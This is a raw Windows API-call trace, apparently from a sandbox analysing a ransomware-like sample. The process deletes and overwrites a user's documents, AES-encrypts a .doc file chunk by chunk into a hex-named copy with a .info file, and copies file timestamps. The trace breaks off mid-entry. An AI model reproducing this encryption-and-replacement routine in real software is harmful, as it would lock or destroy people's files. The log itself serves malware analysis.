1 [0076.637] CloseHandle (hObject=0x36c) returned 1 [0076.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wkzygxhhu.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.638] GetFileType (hFile=0x36c) returned 0x1 [0076.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.638] GetFileType (hFile=0x36c) returned 0x1 [0076.638] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.638] CloseHandle (hObject=0x36c) returned 1 [0076.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.638] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wkzygxhhu.docx")) returned 1 [0076.639] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.639] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E", lpFilePart=0x0) returned 0x51 [0076.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\5973faac59cde84af7aa4f5fa04afd8e"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.639] GetFileType (hFile=0x36c) returned 0x1 [0076.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.639] GetFileType (hFile=0x36c) returned 0x1 [0076.640] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.640] CloseHandle (hObject=0x36c) returned 1 [0076.641] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E", lpFilePart=0x0) returned 0x51 [0076.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.641] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\5973faac59cde84af7aa4f5fa04afd8e"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.641] GetFileType (hFile=0x36c) returned 0x1 [0076.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.641] GetFileType (hFile=0x36c) returned 0x1 [0076.641] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.641] CloseHandle (hObject=0x36c) returned 1 [0076.641] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E", lpFilePart=0x0) returned 0x51 [0076.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.641] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\5973faac59cde84af7aa4f5fa04afd8e"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.641] GetFileType (hFile=0x36c) returned 0x1 [0076.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.641] GetFileType (hFile=0x36c) returned 0x1 [0076.641] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.641] CloseHandle (hObject=0x36c) returned 1 [0076.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.643] CryptAcquireContextW (in: phProv=0x1bf5d168, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5d168*=0x1a5b7710) returned 1 [0076.643] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x223ee60, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626ec0) returned 1 [0076.643] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.644] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.644] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x223ef50, pdwDataLen=0x1bf5d230 | out: pbData=0x223ef50*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.644] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x223f070, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626ad0) returned 1 [0076.644] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.644] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.644] CryptDuplicateKey (in: hKey=0x1a626ad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626c90) returned 1 [0076.644] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.644] CryptSetKeyParam (hKey=0x1a626c90, dwParam=0x4, pbData=0x223f1b8*=0x1, dwFlags=0x0) returned 1 [0076.644] CryptSetKeyParam (hKey=0x1a626c90, dwParam=0x1, pbData=0x223f168, dwFlags=0x0) returned 1 [0076.644] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0076.644] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0076.644] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xth7srl5om21.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.644] GetFileType (hFile=0x36c) returned 0x1 [0076.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.644] GetFileType (hFile=0x36c) returned 0x1 [0076.644] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138", lpFilePart=0x0) returned 0x51 [0076.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c7068a852bc439c755a64820e756138"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.645] GetFileType (hFile=0x3a4) returned 0x1 [0076.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.645] GetFileType (hFile=0x3a4) returned 0x1 [0076.645] ReadFile (in: hFile=0x36c, lpBuffer=0x223f598, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x223f598*, lpNumberOfBytesRead=0x1bf5d128*=0x14000, lpOverlapped=0x0) returned 1 [0076.646] CryptEncrypt (in: hKey=0x1a626c90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22535b0*, pdwDataLen=0x1bf5d180*=0x14000, dwBufLen=0x14000 | out: pbData=0x22535b0*, pdwDataLen=0x1bf5d180*=0x14000) returned 1 [0076.647] WriteFile (in: hFile=0x3a4, lpBuffer=0x22535b0*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x22535b0*, lpNumberOfBytesWritten=0x1bf5d118*=0x14000, lpOverlapped=0x0) returned 1 [0076.648] ReadFile (in: hFile=0x36c, lpBuffer=0x223f598, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x223f598*, lpNumberOfBytesRead=0x1bf5d128*=0x14ef, lpOverlapped=0x0) returned 1 [0076.649] CryptEncrypt (in: hKey=0x1a626c90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22675f0*, pdwDataLen=0x1bf5d180*=0x14e0, dwBufLen=0x14e0 | out: pbData=0x22675f0*, pdwDataLen=0x1bf5d180*=0x14e0) returned 1 [0076.649] WriteFile (in: hFile=0x3a4, lpBuffer=0x22675f0*, nNumberOfBytesToWrite=0x14e0, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x22675f0*, lpNumberOfBytesWritten=0x1bf5d118*=0x14e0, lpOverlapped=0x0) returned 1 [0076.649] ReadFile (in: hFile=0x36c, lpBuffer=0x223f598, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x223f598*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.649] CryptEncrypt (in: hKey=0x1a626c90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2268b10*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x2268b10*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.649] CryptEncrypt (in: hKey=0x1a626c90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2268b60*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x2268b60*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.649] WriteFile (in: hFile=0x3a4, lpBuffer=0x2268bb0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x2268bb0*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0076.649] CloseHandle (hObject=0x3a4) returned 1 [0076.651] CloseHandle (hObject=0x36c) returned 1 [0076.651] CryptDestroyKey (hKey=0x1a626ec0) returned 1 [0076.651] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0076.651] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0076.651] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138", lpFilePart=0x0) returned 0x51 [0076.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.651] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c7068a852bc439c755a64820e756138"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.651] GetFileType (hFile=0x36c) returned 0x1 [0076.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.651] GetFileType (hFile=0x36c) returned 0x1 [0076.651] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.652] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.654] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.655] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.656] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.656] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.656] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.656] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.656] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.656] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.656] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.656] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.656] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.657] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.657] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.657] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.657] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.657] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.657] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.657] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.657] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.658] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x4f0, lpOverlapped=0x0) returned 1 [0076.658] ReadFile (in: hFile=0x36c, lpBuffer=0x226a2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x226a2b8*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.658] CloseHandle (hObject=0x36c) returned 1 [0076.659] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138.info", lpFilePart=0x0) returned 0x56 [0076.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c7068a852bc439c755a64820e756138.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.660] GetFileType (hFile=0x36c) returned 0x1 [0076.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.660] GetFileType (hFile=0x36c) returned 0x1 [0076.662] CloseHandle (hObject=0x36c) returned 1 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.663] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xth7srl5om21.doc"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x606b1060, ftCreationTime.dwHighDateTime=0x1d4cc7b, ftLastAccessTime.dwLowDateTime=0x5328e720, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0x5328e720, ftLastWriteTime.dwHighDateTime=0x1d4d3c3, nFileSizeHigh=0x0, nFileSizeLow=0x154ef)) returned 1 [0076.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.663] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", dwFileAttributes=0x80) returned 1 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.663] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xth7srl5om21.doc"), fInfoLevelId=0x0, lpFileInformation=0x227e590 | out: lpFileInformation=0x227e590*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x606b1060, ftCreationTime.dwHighDateTime=0x1d4cc7b, ftLastAccessTime.dwLowDateTime=0x5328e720, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0x5328e720, ftLastWriteTime.dwHighDateTime=0x1d4d3c3, nFileSizeHigh=0x0, nFileSizeLow=0x154ef)) returned 1 [0076.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.664] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xth7srl5om21.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.664] GetFileType (hFile=0x36c) returned 0x1 [0076.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.664] 